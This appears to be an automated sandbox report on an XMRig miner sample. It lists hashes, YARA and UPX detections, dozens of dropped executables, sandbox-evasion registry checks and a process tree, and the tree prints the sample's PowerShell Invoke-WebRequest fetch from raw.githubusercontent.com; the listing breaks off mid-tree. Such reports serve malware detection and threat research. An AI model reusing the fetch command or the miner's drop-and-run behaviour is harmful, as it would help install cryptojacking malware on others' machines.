xmrig | a33e96a832e2fcea3a58930027c350f306621ca1204e964a35566234871c98be

Analysis

max time kernel
117s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
07/05/2024, 14:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
Size

1.5MB
MD5

b5301703b3e2e26fbbf51ead671d91c0
SHA1

669951176051f47605d2c8a1941ba6e79a486af0
SHA256

a33e96a832e2fcea3a58930027c350f306621ca1204e964a35566234871c98be
SHA512

ed716232441aadb0e59dfa8f94f9fe826a8c134d45cc81167d91c16faf39f98460f56de4cca59cd08d805e773a08a68369e36274650a922643f441ca9aab3feb
SSDEEP

24576:zv3/fTLF671TilQFG4P5PMkipfzaCtNcQcAupQF4g6FReQwUzjms:Lz071uv4BPMki8CnfZFOz0s

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 48 IoCs

miner

resource	yara_rule
behavioral2/memory/4928-37-0x00007FF72F780000-0x00007FF72FB72000-memory.dmp	xmrig
behavioral2/memory/1224-108-0x00007FF648E30000-0x00007FF649222000-memory.dmp	xmrig
behavioral2/memory/3020-147-0x00007FF6025E0000-0x00007FF6029D2000-memory.dmp	xmrig
behavioral2/memory/4176-156-0x00007FF67C330000-0x00007FF67C722000-memory.dmp	xmrig
behavioral2/memory/2492-167-0x00007FF744120000-0x00007FF744512000-memory.dmp	xmrig
behavioral2/memory/3360-181-0x00007FF76AE60000-0x00007FF76B252000-memory.dmp	xmrig
behavioral2/memory/1412-194-0x00007FF759240000-0x00007FF759632000-memory.dmp	xmrig
behavioral2/memory/4728-189-0x00007FF68A900000-0x00007FF68ACF2000-memory.dmp	xmrig
behavioral2/memory/3060-188-0x00007FF668370000-0x00007FF668762000-memory.dmp	xmrig
behavioral2/memory/4900-186-0x00007FF7862A0000-0x00007FF786692000-memory.dmp	xmrig
behavioral2/memory/3580-180-0x00007FF7B37C0000-0x00007FF7B3BB2000-memory.dmp	xmrig
behavioral2/memory/2840-130-0x00007FF67E8E0000-0x00007FF67ECD2000-memory.dmp	xmrig
behavioral2/memory/2280-104-0x00007FF68EDD0000-0x00007FF68F1C2000-memory.dmp	xmrig
behavioral2/memory/892-91-0x00007FF6CC650000-0x00007FF6CCA42000-memory.dmp	xmrig
behavioral2/memory/2340-79-0x00007FF78FF40000-0x00007FF790332000-memory.dmp	xmrig
behavioral2/memory/4304-78-0x00007FF62EEC0000-0x00007FF62F2B2000-memory.dmp	xmrig
behavioral2/memory/2112-45-0x00007FF6AC1D0000-0x00007FF6AC5C2000-memory.dmp	xmrig
behavioral2/memory/1812-42-0x00007FF6D2650000-0x00007FF6D2A42000-memory.dmp	xmrig
behavioral2/memory/4532-2005-0x00007FF7D6C50000-0x00007FF7D7042000-memory.dmp	xmrig
behavioral2/memory/1516-2006-0x00007FF7C6890000-0x00007FF7C6C82000-memory.dmp	xmrig
behavioral2/memory/4920-2008-0x00007FF73D090000-0x00007FF73D482000-memory.dmp	xmrig
behavioral2/memory/3412-2009-0x00007FF66A700000-0x00007FF66AAF2000-memory.dmp	xmrig
behavioral2/memory/1120-2010-0x00007FF76F1C0000-0x00007FF76F5B2000-memory.dmp	xmrig
behavioral2/memory/2076-2011-0x00007FF75FC50000-0x00007FF760042000-memory.dmp	xmrig
behavioral2/memory/4928-2013-0x00007FF72F780000-0x00007FF72FB72000-memory.dmp	xmrig
behavioral2/memory/4304-2015-0x00007FF62EEC0000-0x00007FF62F2B2000-memory.dmp	xmrig
behavioral2/memory/1812-2017-0x00007FF6D2650000-0x00007FF6D2A42000-memory.dmp	xmrig
behavioral2/memory/2112-2019-0x00007FF6AC1D0000-0x00007FF6AC5C2000-memory.dmp	xmrig
behavioral2/memory/2340-2021-0x00007FF78FF40000-0x00007FF790332000-memory.dmp	xmrig
behavioral2/memory/4532-2023-0x00007FF7D6C50000-0x00007FF7D7042000-memory.dmp	xmrig
behavioral2/memory/2280-2027-0x00007FF68EDD0000-0x00007FF68F1C2000-memory.dmp	xmrig
behavioral2/memory/892-2026-0x00007FF6CC650000-0x00007FF6CCA42000-memory.dmp	xmrig
behavioral2/memory/1224-2061-0x00007FF648E30000-0x00007FF649222000-memory.dmp	xmrig
behavioral2/memory/1516-2062-0x00007FF7C6890000-0x00007FF7C6C82000-memory.dmp	xmrig
behavioral2/memory/3580-2064-0x00007FF7B37C0000-0x00007FF7B3BB2000-memory.dmp	xmrig
behavioral2/memory/3360-2066-0x00007FF76AE60000-0x00007FF76B252000-memory.dmp	xmrig
behavioral2/memory/4920-2069-0x00007FF73D090000-0x00007FF73D482000-memory.dmp	xmrig
behavioral2/memory/3020-2071-0x00007FF6025E0000-0x00007FF6029D2000-memory.dmp	xmrig
behavioral2/memory/2840-2074-0x00007FF67E8E0000-0x00007FF67ECD2000-memory.dmp	xmrig
behavioral2/memory/4176-2073-0x00007FF67C330000-0x00007FF67C722000-memory.dmp	xmrig
behavioral2/memory/3060-2081-0x00007FF668370000-0x00007FF668762000-memory.dmp	xmrig
behavioral2/memory/4900-2082-0x00007FF7862A0000-0x00007FF786692000-memory.dmp	xmrig
behavioral2/memory/4728-2078-0x00007FF68A900000-0x00007FF68ACF2000-memory.dmp	xmrig
behavioral2/memory/3412-2077-0x00007FF66A700000-0x00007FF66AAF2000-memory.dmp	xmrig
behavioral2/memory/1412-2084-0x00007FF759240000-0x00007FF759632000-memory.dmp	xmrig
behavioral2/memory/1120-2086-0x00007FF76F1C0000-0x00007FF76F5B2000-memory.dmp	xmrig
behavioral2/memory/2492-2089-0x00007FF744120000-0x00007FF744512000-memory.dmp	xmrig
behavioral2/memory/2076-2094-0x00007FF75FC50000-0x00007FF760042000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	1528	powershell.exe
11	1528	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1528	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
4928	UwoyLQb.exe
4304	HwISWpl.exe
1812	OUaLvLy.exe
2112	KsCqRva.exe
2340	aVHXjHg.exe
4532	PjrZMyZ.exe
892	nMvPhYI.exe
1516	QjQwxed.exe
3580	XhbZCiQ.exe
2280	CgwUuBt.exe
1224	lRdWZgZ.exe
3360	JUydtmi.exe
4900	sfNjwMl.exe
4920	zUIhJKW.exe
2840	ddRWnkg.exe
3020	zOFNLuI.exe
3412	GnhDkNI.exe
4176	MhwQjSz.exe
3060	hxDkrLy.exe
4728	ftTWFVH.exe
1412	REjGJku.exe
1120	UcboLIU.exe
2492	FVbcSBx.exe
2076	RsqFPzF.exe
2288	pLsmScc.exe
2244	VyWQkOi.exe
1680	YyqRSif.exe
4892	hfPhokW.exe
1464	pTbGpAb.exe
2984	OaYHsSE.exe
3420	nOzzDvG.exe
3684	MUXqNpX.exe
2928	dhemsmB.exe
996	Ejchioq.exe
3268	OMiKNmp.exe
372	uRodupl.exe
4556	jzHjRWu.exe
4756	QDyBaaU.exe
2208	VRlLmjn.exe
4524	szaLPZl.exe
3284	pHDoQwt.exe
2704	cEjycWp.exe
2744	jOyyWqc.exe
2672	SOgBvxZ.exe
5056	GldXRBq.exe
760	WdvyOWa.exe
4340	ihiWvOA.exe
2732	ZDNPMJe.exe
2176	jxKaxgz.exe
1724	Reyripw.exe
3144	jbqwyvq.exe
3536	vJyRqsY.exe
4608	HvRiInw.exe
3380	oaNuEts.exe
1628	oZHfOKk.exe
4388	IERFhSl.exe
4692	EAniMpe.exe
4792	TaEsDJK.exe
4476	eTJYYrW.exe
4648	lJpLGTY.exe
2016	DqtWylc.exe
4088	fAwIznb.exe
1104	rXHxzGP.exe
2200	Tqybgfp.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1168-0-0x00007FF6F98D0000-0x00007FF6F9CC2000-memory.dmp	upx
behavioral2/files/0x0006000000023298-5.dat	upx
behavioral2/files/0x0007000000023453-8.dat	upx
behavioral2/files/0x0007000000023452-12.dat	upx
behavioral2/files/0x0007000000023454-21.dat	upx
behavioral2/memory/4928-37-0x00007FF72F780000-0x00007FF72FB72000-memory.dmp	upx
behavioral2/files/0x0007000000023458-41.dat	upx
behavioral2/files/0x0008000000023457-48.dat	upx
behavioral2/files/0x000700000002345a-64.dat	upx
behavioral2/files/0x000700000002345b-70.dat	upx
behavioral2/files/0x0007000000023462-103.dat	upx
behavioral2/memory/1224-108-0x00007FF648E30000-0x00007FF649222000-memory.dmp	upx
behavioral2/files/0x0007000000023466-143.dat	upx
behavioral2/memory/3020-147-0x00007FF6025E0000-0x00007FF6029D2000-memory.dmp	upx
behavioral2/memory/4176-156-0x00007FF67C330000-0x00007FF67C722000-memory.dmp	upx
behavioral2/memory/2492-167-0x00007FF744120000-0x00007FF744512000-memory.dmp	upx
behavioral2/memory/2076-174-0x00007FF75FC50000-0x00007FF760042000-memory.dmp	upx
behavioral2/memory/3360-181-0x00007FF76AE60000-0x00007FF76B252000-memory.dmp	upx
behavioral2/files/0x000700000002346d-190.dat	upx
behavioral2/files/0x0007000000023470-200.dat	upx
behavioral2/files/0x000700000002346f-197.dat	upx
behavioral2/files/0x000700000002346e-195.dat	upx
behavioral2/memory/1412-194-0x00007FF759240000-0x00007FF759632000-memory.dmp	upx
behavioral2/memory/4728-189-0x00007FF68A900000-0x00007FF68ACF2000-memory.dmp	upx
behavioral2/memory/3060-188-0x00007FF668370000-0x00007FF668762000-memory.dmp	upx
behavioral2/memory/4900-186-0x00007FF7862A0000-0x00007FF786692000-memory.dmp	upx
behavioral2/memory/3580-180-0x00007FF7B37C0000-0x00007FF7B3BB2000-memory.dmp	upx
behavioral2/files/0x000700000002346c-179.dat	upx
behavioral2/files/0x000900000002344d-172.dat	upx
behavioral2/files/0x000700000002346b-168.dat	upx
behavioral2/files/0x000700000002346a-175.dat	upx
behavioral2/memory/1120-166-0x00007FF76F1C0000-0x00007FF76F5B2000-memory.dmp	upx
behavioral2/files/0x0007000000023468-163.dat	upx
behavioral2/files/0x0007000000023467-162.dat	upx
behavioral2/files/0x0007000000023465-158.dat	upx
behavioral2/files/0x0007000000023469-169.dat	upx
behavioral2/memory/3412-148-0x00007FF66A700000-0x00007FF66AAF2000-memory.dmp	upx
behavioral2/files/0x000700000002345d-141.dat	upx
behavioral2/files/0x0007000000023464-135.dat	upx
behavioral2/files/0x0007000000023463-131.dat	upx
behavioral2/memory/2840-130-0x00007FF67E8E0000-0x00007FF67ECD2000-memory.dmp	upx
behavioral2/files/0x0007000000023460-114.dat	upx
behavioral2/memory/4920-109-0x00007FF73D090000-0x00007FF73D482000-memory.dmp	upx
behavioral2/files/0x0007000000023461-116.dat	upx
behavioral2/files/0x000700000002345f-112.dat	upx
behavioral2/files/0x000700000002345e-111.dat	upx
behavioral2/memory/2280-104-0x00007FF68EDD0000-0x00007FF68F1C2000-memory.dmp	upx
behavioral2/files/0x000700000002345c-94.dat	upx
behavioral2/memory/892-91-0x00007FF6CC650000-0x00007FF6CCA42000-memory.dmp	upx
behavioral2/memory/2340-79-0x00007FF78FF40000-0x00007FF790332000-memory.dmp	upx
behavioral2/memory/4304-78-0x00007FF62EEC0000-0x00007FF62F2B2000-memory.dmp	upx
behavioral2/files/0x0007000000023459-74.dat	upx
behavioral2/files/0x0008000000023456-60.dat	upx
behavioral2/memory/1516-56-0x00007FF7C6890000-0x00007FF7C6C82000-memory.dmp	upx
behavioral2/files/0x0007000000023455-51.dat	upx
behavioral2/memory/4532-49-0x00007FF7D6C50000-0x00007FF7D7042000-memory.dmp	upx
behavioral2/memory/2112-45-0x00007FF6AC1D0000-0x00007FF6AC5C2000-memory.dmp	upx
behavioral2/memory/1812-42-0x00007FF6D2650000-0x00007FF6D2A42000-memory.dmp	upx
behavioral2/memory/4532-2005-0x00007FF7D6C50000-0x00007FF7D7042000-memory.dmp	upx
behavioral2/memory/1516-2006-0x00007FF7C6890000-0x00007FF7C6C82000-memory.dmp	upx
behavioral2/memory/4920-2008-0x00007FF73D090000-0x00007FF73D482000-memory.dmp	upx
behavioral2/memory/3412-2009-0x00007FF66A700000-0x00007FF66AAF2000-memory.dmp	upx
behavioral2/memory/1120-2010-0x00007FF76F1C0000-0x00007FF76F5B2000-memory.dmp	upx
behavioral2/memory/2076-2011-0x00007FF75FC50000-0x00007FF760042000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	raw.githubusercontent.com
9	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\FKjvSpb.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\alkxyaT.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\KSKsEut.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\WAufXDt.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\ISHoctd.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\aGsHEOp.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\ozCuNND.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\vnFofAH.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\uRaIOCi.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\YUiKBfn.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\hxDkrLy.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\BSpsTwA.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\kydTbOo.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\wYfMeal.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\UBZWWao.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\oxcRvZg.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\oFZtUKh.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\eTJYYrW.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\JibMwjV.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\PkYgqRR.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\lpDOiqo.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\NmMhbhD.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\RrFJedf.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\zDAfUjD.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\lLWHhzQ.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\vgVgRjC.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\yUsUdWb.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\oLSMyHG.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\jzHjRWu.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\GQCMKVT.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\FFsizKH.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\PzZJwLc.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\uaCPcGy.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\KriDPIt.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\Nvicdmw.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\EWdpysg.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\WwSwPGu.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\qaLVBbi.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\qAAsonV.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\bggLnFe.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\Qtwdyuc.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\tFhpdhe.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\FrmPrVG.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\soABrRz.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\zuDzGJJ.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\AGUiKTD.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\qaNJfIJ.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\EKOBNYw.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\VUdIfCq.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\Iddyidp.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\vBPKlSv.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\hfPhokW.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\LbSnXTM.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\GifYPtD.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\ATyICro.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\sjmdWMf.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\oZHfOKk.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\DxBCuaK.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\syWolXn.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\DFdKKVk.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\DXaaEdZ.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\MojOZMg.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\OfBRbVu.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
File created	C:\Windows\System\xFEIYPo.exe	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1528	powershell.exe
1528	powershell.exe
1528	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
Token: SeLockMemoryPrivilege	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
Token: SeDebugPrivilege	1528	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1168 wrote to memory of 1528	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	84
PID 1168 wrote to memory of 1528	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	84
PID 1168 wrote to memory of 4928	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	85
PID 1168 wrote to memory of 4928	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	85
PID 1168 wrote to memory of 4304	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	86
PID 1168 wrote to memory of 4304	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	86
PID 1168 wrote to memory of 1812	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	87
PID 1168 wrote to memory of 1812	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	87
PID 1168 wrote to memory of 2112	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	88
PID 1168 wrote to memory of 2112	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	88
PID 1168 wrote to memory of 2340	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	89
PID 1168 wrote to memory of 2340	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	89
PID 1168 wrote to memory of 4532	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	90
PID 1168 wrote to memory of 4532	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	90
PID 1168 wrote to memory of 892	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	91
PID 1168 wrote to memory of 892	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	91
PID 1168 wrote to memory of 1516	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	92
PID 1168 wrote to memory of 1516	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	92
PID 1168 wrote to memory of 3580	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	93
PID 1168 wrote to memory of 3580	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	93
PID 1168 wrote to memory of 2280	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	94
PID 1168 wrote to memory of 2280	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	94
PID 1168 wrote to memory of 1224	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	95
PID 1168 wrote to memory of 1224	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	95
PID 1168 wrote to memory of 3360	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	96
PID 1168 wrote to memory of 3360	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	96
PID 1168 wrote to memory of 4900	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	97
PID 1168 wrote to memory of 4900	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	97
PID 1168 wrote to memory of 4920	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	98
PID 1168 wrote to memory of 4920	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	98
PID 1168 wrote to memory of 2840	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	99
PID 1168 wrote to memory of 2840	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	99
PID 1168 wrote to memory of 3020	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	100
PID 1168 wrote to memory of 3020	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	100
PID 1168 wrote to memory of 3412	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	101
PID 1168 wrote to memory of 3412	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	101
PID 1168 wrote to memory of 4176	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	102
PID 1168 wrote to memory of 4176	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	102
PID 1168 wrote to memory of 3060	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	103
PID 1168 wrote to memory of 3060	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	103
PID 1168 wrote to memory of 4728	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	104
PID 1168 wrote to memory of 4728	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	104
PID 1168 wrote to memory of 1412	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	105
PID 1168 wrote to memory of 1412	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	105
PID 1168 wrote to memory of 1120	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	106
PID 1168 wrote to memory of 1120	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	106
PID 1168 wrote to memory of 2492	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	107
PID 1168 wrote to memory of 2492	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	107
PID 1168 wrote to memory of 2076	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	108
PID 1168 wrote to memory of 2076	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	108
PID 1168 wrote to memory of 2288	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	109
PID 1168 wrote to memory of 2288	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	109
PID 1168 wrote to memory of 2244	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	110
PID 1168 wrote to memory of 2244	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	110
PID 1168 wrote to memory of 1680	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	111
PID 1168 wrote to memory of 1680	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	111
PID 1168 wrote to memory of 4892	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	112
PID 1168 wrote to memory of 4892	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	112
PID 1168 wrote to memory of 1464	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	113
PID 1168 wrote to memory of 1464	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	113
PID 1168 wrote to memory of 2984	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	114
PID 1168 wrote to memory of 2984	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	114
PID 1168 wrote to memory of 3420	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	115
PID 1168 wrote to memory of 3420	1168	b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe	115

C:\Users\Admin\AppData\Local\Temp\b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe
"C:\Users\Admin\AppData\Local\Temp\b5301703b3e2e26fbbf51ead671d91c0_NEAS.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1528
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1528" "2988" "1908" "2992" "0" "0" "2996" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:13008
- C:\Windows\System\UwoyLQb.exe
  C:\Windows\System\UwoyLQb.exe
  2⤵
  - Executes dropped EXE
  PID:4928
- C:\Windows\System\HwISWpl.exe
  C:\Windows\System\HwISWpl.exe
  2⤵
  - Executes dropped EXE
  PID:4304
- C:\Windows\System\OUaLvLy.exe
  C:\Windows\System\OUaLvLy.exe
  2⤵
  - Executes dropped EXE
  PID:1812
- C:\Windows\System\KsCqRva.exe
  C:\Windows\System\KsCqRva.exe
  2⤵
  - Executes dropped EXE
  PID:2112
- C:\Windows\System\aVHXjHg.exe
  C:\Windows\System\aVHXjHg.exe
  2⤵
  - Executes dropped EXE
  PID:2340
- C:\Windows\System\PjrZMyZ.exe
  C:\Windows\System\PjrZMyZ.exe
  2⤵
  - Executes dropped EXE
  PID:4532
- C:\Windows\System\nMvPhYI.exe
  C:\Windows\System\nMvPhYI.exe
  2⤵
  - Executes dropped EXE
  PID:892
- C:\Windows\System\QjQwxed.exe
  C:\Windows\System\QjQwxed.exe
  2⤵
  - Executes dropped EXE
  PID:1516
- C:\Windows\System\XhbZCiQ.exe
